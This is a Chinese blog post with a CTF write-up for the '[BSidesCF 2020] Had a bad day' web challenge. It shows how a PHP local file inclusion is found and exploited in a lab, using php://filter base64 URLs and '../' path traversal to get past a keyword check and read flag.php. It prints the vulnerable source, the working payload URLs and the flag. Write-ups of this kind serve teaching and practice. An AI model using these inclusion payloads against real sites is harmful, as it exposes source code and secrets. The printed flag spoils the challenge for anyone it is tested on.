[BSidesCF 2020]Had a bad day

最新推荐文章于 2022-08-13 17:16:49 发布
最新推荐文章于 2022-08-13 17:16:49 发布
阅读量120 收藏
点赞数
分类专栏: CTF题目(web) 文章标签: php web 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52907838/article/details/118652510
版权

打开环境,有两个选择按钮,woofers和meowers,随意点击一个,出现了一张小狗的图片,但url中

有GET传参: index.php?category=woofers,怀疑是文件包含,访问一下woofers.php看存不存在:

 访问成功,再尝试修改category的值(后面加几个字母之类的):

 有include报错,这都说明是文件包含。

那就可以尝试用php伪协议读取源码:

url/index.php?category=php://filter/read=convert.base64-encode/resource=index.php

没有成功,多次尝试,发现需要去掉后缀名:

url/index.php?category=php://filter/read=convert.base64-encode/resource=index

base64解密,得到源码:

<?php
	$file = $_GET['category'];

	if(isset($file))
	{
		if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
			include ($file . '.php');
		}
		else{
			echo "Sorry, we currently only support woofers and meowers.";
		}
	}
?>
  • 通过GET方式传入变量category的值
  • 传入的值中需包含woofersmeowersindex,才能包含传入的文件。

直接读取试试:

/index.php?category=woofers/../flag

源码中出现:

 页面内容变了但是没报错,说明包含对了,但是需要读取flag.php。

1.尝试继续使用php伪协议读取flag.php:

url/index.php?category=php://filter/read=convert.base64-encode/resource=flag

传入的值中没有包含woofersmeowersindex,所以没有成功。

php://filter可以在resource之前嵌套一层目录:

php://filter/read=convert.base64-encode/meowers/resource=flag

得到base64,解密得:

<!-- Can you read this flag? -->
<?php
 // flag{93e870b8-f100-43a9-9f7a-ad44f1c64595}
?>

2.可以通过拼接方式绕过:

index.php?category=php://filter/read=convert.base64-encode/resource=meowers/../flag

得到base64,解密得flag

Kevin_xiao~
关注
专栏目录
[BSidesCF 2020]Had a bad day 1(伪协议嵌套)
weixin_45577185的博客
09-06 277
先用php://filter/read=convert.base64-encode/resource=index.php读取index.php的页面代码看看,发现读取不成功,后来才发现.php是后来加上去的 php://filter/read=convert.base64-encode/resource=index 然后用base64解密 <?php $file = $_GET['category']; if(isset($file)) { if( strpos( $file, "woofers".
buu做题笔记——[WUSTCTF2020]朴实无华&[BSidesCF 2020]Had a bad day
weixin_46330722的博客
11-07 678
BUU[WUSTCTF2020]朴实无华robots.txtresponselevel 1level 2level 3[BSidesCF 2020]Had a bad day [WUSTCTF2020]朴实无华 robots.txt 进入题目界面就一个Hack me,抓包也没看到啥有用的。dirsearch开启 ! 扫一扫有没有什么有用的,但是全都429,只能手动扫描了。备份文件,git泄露,robots协议…全都试一遍 。终于在robots.txt里找到了有用的东西。 response 访问是一个有
[BUUCTF] 集训第一天
Dannie01的博客
09-29 367
[网鼎杯 2020 朱雀组]phpweb 1 [安洵杯 2019]easy_web 1 打开注意到img值 选正确且最强的解码工具解码 两次base64解码+hex转str hackbar解码 有获取文件内容功能,尝试编码获取index. php 最强base64工具获取图片base解密信息,拿到index.php关键源码 <?php error_reporting(E_ALL || ~ E_NOTICE); header('content-type:text/html;char
BSidesCF2020 Had a bad day
Tajang的大千世界
04-11 162
打开靶机 点击了一下WOOFERS,发现url类似于文件包含 尝试包含index.php php://filter/read=convert.base64-encode/resource=index.php 的确存在文件包含,但报错了,应该是包含的文件不对,一番尝试后,发现应该去掉后缀,如下 php://filter/read=convert.base64-encode/resource=index 给了一串编码,使用base64解码 其中PHP源码为 <?php $file =
六年级英语上册 Unit 7 I had a bad day.第一课时教案 广东版开心.doc
10-13
小学教案
六年级英语上册 Unit 7 I had a bad day.第三课时教案 广东版开心.doc
10-13
小学教案
【buu-BSideCF-2020-Had a bad day1】
lalalalafan的博客
11-15 2807
1.打开看源码,啥也没得,参数后面加'就报错了,是一道文件包含 2.读源码 ?category=php://filter/read=convert.base64-encode/resource=index.php 报错了,后端自己加上了.php,所以我们删了 ?category=php://filter/read=convert.base64-encode/resource=index 就可以得到base64编码后的源码了 解码得到源码 <?php $file = $
buuctf 刷题 6(WEB-INF/web.xml&&&&Smarty模板注入&&py脚本编写)
weixin_63231007的博客
05-25 772
[RoarCTF 2019]Easy Java 进去页面,得到一个登录框。因为题目是java,应该不是sql注入, 点开help,看见: filename参数可控 。没做过相应的java安全题目。看其他师傅题解可知,可能存在文件下载漏洞 url 栏里get传入WEB-INF/web.xml。无果,post传入意外发现可以下载文件。 下载存有web信息的XML文件:WEB-INF/web.xml 查看文件内容,文件里内容有: <servlet> &l
buuctf(探险3)
qq_62046696的博客
08-13 956
if(!strstr($get_flag," ")){ get传参进入的,里面没有空格、str_ireplace(子字符串忽略大小写替换)第二行,就是把get_flag中的cat 换成wctf20220,说白了就是过滤cat那我们先用ls查一下目录可是并没有什么回显,不知道我是哪错了看了大佬解释,说是传入的2e4不需要空格,这些都会自动加上出来了,但是我们查找目录 cat flag中间一定会有空格,的这里肯定是需要一种别的手段绕过一下。...
BUUCTF刷题记录(6)
bmth666的博客
05-14 7505
文章目录web[FBCTF2019]RCEService web 打ctf(×) 被ctf打(√) [FBCTF2019]RCEService 首先查看文件夹文件,{"cmd":"ls"} 然后输入其他的发现被ban了,看wp得源码 <?php putenv('PATH=/home/rceservice/jail'); if (isset($_REQUEST['cmd'])) { ...
buuoj刷的两道简单ctf题
臭nana的博客
06-09 713
虽然简单,但是有一些小trick值得记录一下 [MRCTF2020]套娃 F12查看源码,发现可疑代码 <!-- //1st $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE!'); } if($_GET['b_u_p_t'] !== '23333' &&
BUUCTF:[BSidesCF 2020]Had a bad day
末初的CSDN博客
03-30 5501
BUUCTF:[BSidesCF 2020]Had a bad day 可能存在SQL注入或者文件包含,在我尝试读取index.php源码的时候出现了报错信息 的确是文件包含,但是有index.php却读取错误,报错显示无法打开流:操作失败在后面测试的时候,发现除掉后缀即可读取到源码 base64解码读取源码 <?php $file = $_GET['category']; ...
2020-11-18
YIHAHUHA的博客
11-18 266
[BSidesCF 2020]Had a bad day 目录穿越 url可以包含文件,因为会自己加上.php的后缀,所以就只能包含 xxx.php 文件。先把可以读取的都看一遍。 /index.php?category=php://filter/read=convert.base64-encode/resource=xxx 源码表示: $_GET[‘category’]参数里里面必须带有 woofers ,meowers或者 index 找找flag的位置~~ 正好利用include()可以目录穿越,
BUUCTF-2020寒假刷题记录
qq_33624424的博客
06-26 3404
BUUCTF-2020寒假刷题记录 Web [RoarCTF 2019]Easy Calc 打开源码,看到calc.php,打开看到源码。 在 num 前面加个空格即可绕过 ? num=phpinfo(); calc.php? num=print_r(scandir(chr(47))) 列出目录 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-1JiYRIUE-1593173106930)(https://i.loli.net/2020/01/19/8HzGU3tFQPIVa
[NCTF2019]True XML cookbook
qq_52907838的博客
08-04 2600
打开环境,看到熟悉的页面,和前面的[NCTF2019]Fake XML cookbook页面一样,应该也是XXE漏洞,这里再介绍一下XXE漏洞: XXE(XML External Entity Injection)全称为XML外部实体注入。 XML是什么? XML指可扩展标记语言(EXtensible Markup Language),其设计宗旨是传输数据,而不是显示数据,用来结构化、存储以及传输信息,它没有预定义的标签。XML 和 HTML 之间的差异是什么? 设计目的不同:XML 被设计用来传输
HAD门机安装与操作手册:注意事项与规格详解
HAD门机手册详细介绍了HAD品牌的变频器控制器的操作、调试、安装以及注意事项。首先,手册强调了H100版及后续型号的门机变频器的控制模式切换,通过变频器壳体上的手动/自动开关进行设置,手动模式用于面板控制,...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Kevin_xiao~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值